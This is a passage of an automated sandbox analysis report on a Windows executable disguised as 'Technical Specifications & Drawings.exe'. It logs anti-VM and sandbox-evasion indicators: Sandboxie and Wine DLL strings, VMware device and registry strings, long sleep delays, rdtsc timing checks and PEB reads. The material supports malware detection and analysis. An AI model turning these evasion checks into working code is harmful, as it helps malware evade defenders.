          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe TID: 6116Thread sleep time: -45877s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe TID: 3116Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1972Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01875BA5 rdtsc 4_2_01875BA5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeAPI coverage: 4.0 %
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeThread delayed: delay time: 45877Jump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000005.00000000.306843353.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
          Source: explorer.exe, 00000005.00000000.309044837.0000000008476000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: lume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.320624186.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 00000005.00000000.320680950.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
          Source: explorer.exe, 00000005.00000000.327010240.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
          Source: explorer.exe, 00000005.00000000.323194447.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 00000005.00000000.330711449.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000005.00000000.306843353.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01875BA5 rdtsc 4_2_01875BA5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AB171 mov eax, dword ptr fs:[00000030h]4_2_017AB171
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AB171 mov eax, dword ptr fs:[00000030h]4_2_017AB171
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AC962 mov eax, dword ptr fs:[00000030h]4_2_017AC962
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018649A4 mov eax, dword ptr fs:[00000030h]4_2_018649A4
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018649A4 mov eax, dword ptr fs:[00000030h]4_2_018649A4
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018649A4 mov eax, dword ptr fs:[00000030h]4_2_018649A4
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018649A4 mov eax, dword ptr fs:[00000030h]4_2_018649A4
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018269A6 mov eax, dword ptr fs:[00000030h]4_2_018269A6
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB944 mov eax, dword ptr fs:[00000030h]4_2_017CB944
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB944 mov eax, dword ptr fs:[00000030h]4_2_017CB944
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018251BE mov eax, dword ptr fs:[00000030h]4_2_018251BE
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018251BE mov eax, dword ptr fs:[00000030h]4_2_018251BE
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018251BE mov eax, dword ptr fs:[00000030h]4_2_018251BE
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018251BE mov eax, dword ptr fs:[00000030h]4_2_018251BE
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D513A mov eax, dword ptr fs:[00000030h]4_2_017D513A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D513A mov eax, dword ptr fs:[00000030h]4_2_017D513A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C4120 mov eax, dword ptr fs:[00000030h]4_2_017C4120
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C4120 mov eax, dword ptr fs:[00000030h]4_2_017C4120
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C4120 mov eax, dword ptr fs:[00000030h]4_2_017C4120
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C4120 mov eax, dword ptr fs:[00000030h]4_2_017C4120
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C4120 mov ecx, dword ptr fs:[00000030h]4_2_017C4120
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018341E8 mov eax, dword ptr fs:[00000030h]4_2_018341E8
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9100 mov eax, dword ptr fs:[00000030h]4_2_017A9100
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9100 mov eax, dword ptr fs:[00000030h]4_2_017A9100
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9100 mov eax, dword ptr fs:[00000030h]4_2_017A9100
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AB1E1 mov eax, dword ptr fs:[00000030h]4_2_017AB1E1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AB1E1 mov eax, dword ptr fs:[00000030h]4_2_017AB1E1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AB1E1 mov eax, dword ptr fs:[00000030h]4_2_017AB1E1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov eax, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov eax, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov eax, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov eax, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D61A0 mov eax, dword ptr fs:[00000030h]4_2_017D61A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D61A0 mov eax, dword ptr fs:[00000030h]4_2_017D61A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2990 mov eax, dword ptr fs:[00000030h]4_2_017D2990
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DA185 mov eax, dword ptr fs:[00000030h]4_2_017DA185
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CC182 mov eax, dword ptr fs:[00000030h]4_2_017CC182
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01823884 mov eax, dword ptr fs:[00000030h]4_2_01823884
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01823884 mov eax, dword ptr fs:[00000030h]4_2_01823884
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C0050 mov eax, dword ptr fs:[00000030h]4_2_017C0050
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C0050 mov eax, dword ptr fs:[00000030h]4_2_017C0050
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830 mov eax, dword ptr fs:[00000030h]4_2_017CA830
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830 mov eax, dword ptr fs:[00000030h]4_2_017CA830
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830 mov eax, dword ptr fs:[00000030h]4_2_017CA830
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830 mov eax, dword ptr fs:[00000030h]4_2_017CA830
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]4_2_017D002D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]4_2_017D002D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]4_2_017D002D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]4_2_017D002D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]4_2_017D002D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB02A mov eax, dword ptr fs:[00000030h]4_2_017BB02A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB02A mov eax, dword ptr fs:[00000030h]4_2_017BB02A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB02A mov eax, dword ptr fs:[00000030h]4_2_017BB02A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB02A mov eax, dword ptr fs:[00000030h]4_2_017BB02A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]4_2_0183B8D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov ecx, dword ptr fs:[00000030h]4_2_0183B8D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]4_2_0183B8D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]4_2_0183B8D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]4_2_0183B8D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]4_2_0183B8D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01874015 mov eax, dword ptr fs:[00000030h]4_2_01874015
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01874015 mov eax, dword ptr fs:[00000030h]4_2_01874015
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827016 mov eax, dword ptr fs:[00000030h]4_2_01827016
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827016 mov eax, dword ptr fs:[00000030h]4_2_01827016
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827016 mov eax, dword ptr fs:[00000030h]4_2_01827016
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A58EC mov eax, dword ptr fs:[00000030h]4_2_017A58EC
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB8E4 mov eax, dword ptr fs:[00000030h]4_2_017CB8E4
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB8E4 mov eax, dword ptr fs:[00000030h]4_2_017CB8E4
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A40E1 mov eax, dword ptr fs:[00000030h]4_2_017A40E1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A40E1 mov eax, dword ptr fs:[00000030h]4_2_017A40E1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A40E1 mov eax, dword ptr fs:[00000030h]4_2_017A40E1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DF0BF mov ecx, dword ptr fs:[00000030h]4_2_017DF0BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DF0BF mov eax, dword ptr fs:[00000030h]4_2_017DF0BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DF0BF mov eax, dword ptr fs:[00000030h]4_2_017DF0BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E90AF mov eax, dword ptr fs:[00000030h]4_2_017E90AF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]4_2_017D20A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]4_2_017D20A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]4_2_017D20A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]4_2_017D20A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]4_2_017D20A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]4_2_017D20A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01871074 mov eax, dword ptr fs:[00000030h]4_2_01871074
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862073 mov eax, dword ptr fs:[00000030h]4_2_01862073
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9080 mov eax, dword ptr fs:[00000030h]4_2_017A9080
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185D380 mov ecx, dword ptr fs:[00000030h]4_2_0185D380
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D3B7A mov eax, dword ptr fs:[00000030h]4_2_017D3B7A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D3B7A mov eax, dword ptr fs:[00000030h]4_2_017D3B7A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186138A mov eax, dword ptr fs:[00000030h]4_2_0186138A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017ADB60 mov ecx, dword ptr fs:[00000030h]4_2_017ADB60
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01875BA5 mov eax, dword ptr fs:[00000030h]4_2_01875BA5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AF358 mov eax, dword ptr fs:[00000030h]4_2_017AF358
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017ADB40 mov eax, dword ptr fs:[00000030h]4_2_017ADB40
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018253CA mov eax, dword ptr fs:[00000030h]4_2_018253CA
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018253CA mov eax, dword ptr fs:[00000030h]4_2_018253CA
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018523E3 mov ecx, dword ptr fs:[00000030h]4_2_018523E3
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018523E3 mov ecx, dword ptr fs:[00000030h]4_2_018523E3
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018523E3 mov eax, dword ptr fs:[00000030h]4_2_018523E3
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CDBE9 mov eax, dword ptr fs:[00000030h]4_2_017CDBE9
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186131B mov eax, dword ptr fs:[00000030h]4_2_0186131B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]4_2_017D03E2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]4_2_017D03E2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]4_2_017D03E2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]4_2_017D03E2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]4_2_017D03E2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]4_2_017D03E2
